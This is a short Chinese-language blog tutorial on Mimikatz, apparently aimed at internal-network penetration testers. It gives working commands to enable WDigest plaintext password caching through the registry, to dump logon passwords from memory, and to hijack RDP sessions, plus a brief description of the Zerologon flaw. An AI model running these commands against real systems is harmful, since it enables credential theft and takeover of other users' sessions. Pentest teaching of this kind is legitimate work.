Mimikatz使用教程

介绍

Mimikatz是一款开源的Windows安全工具,它被作者定义为“用来学习C语言和做一些Windows安全性实验的工具”。Mimikatz工具在Windows操作系统中运行时,可以从内存中提取出操作系统的明文密码、哈希、PIN码和Kerberos票据等,并支持哈希传递(pass-the-hash)、票据传递(pass-the-ticket)和构建黄金票据等功能。Mimikatz工具发展到今天,在开源社区的助力下,已经成为在内网渗透测试中必不可少的工具之一。除了本机凭证相关功能之外,Mimikatz甚至还引入了RDP远程桌面服务劫持、Zerologon自动化获取域控权限等强大的功能。
下载地址
注意:当目的为win 10或者2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Mimikatz命令

提升权限命令

privilege::debug

img

抓取明文密码

privilege::debug
sekurlsa::logonpasswords

img

会话劫持

ts::sessions   查看当前目标主机存活的会话列表
privilege::debug
token::elevate
ts::remote /id:1    将远程桌面切换到会话ID为1的用户身份中

补充点:Zerologon漏洞(CVE-2020-1472),通过该漏洞,只需要访问域控服务器的445端口,就可以在不需要任何有效凭证的情况下获取域管理员的权限。Zerologon漏洞的成因是Netlogon协议认证的加密模块存在设计缺陷,导致可以在不具备有效凭证的情况下通过认证。

posted @   kalixcn  阅读(1008)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示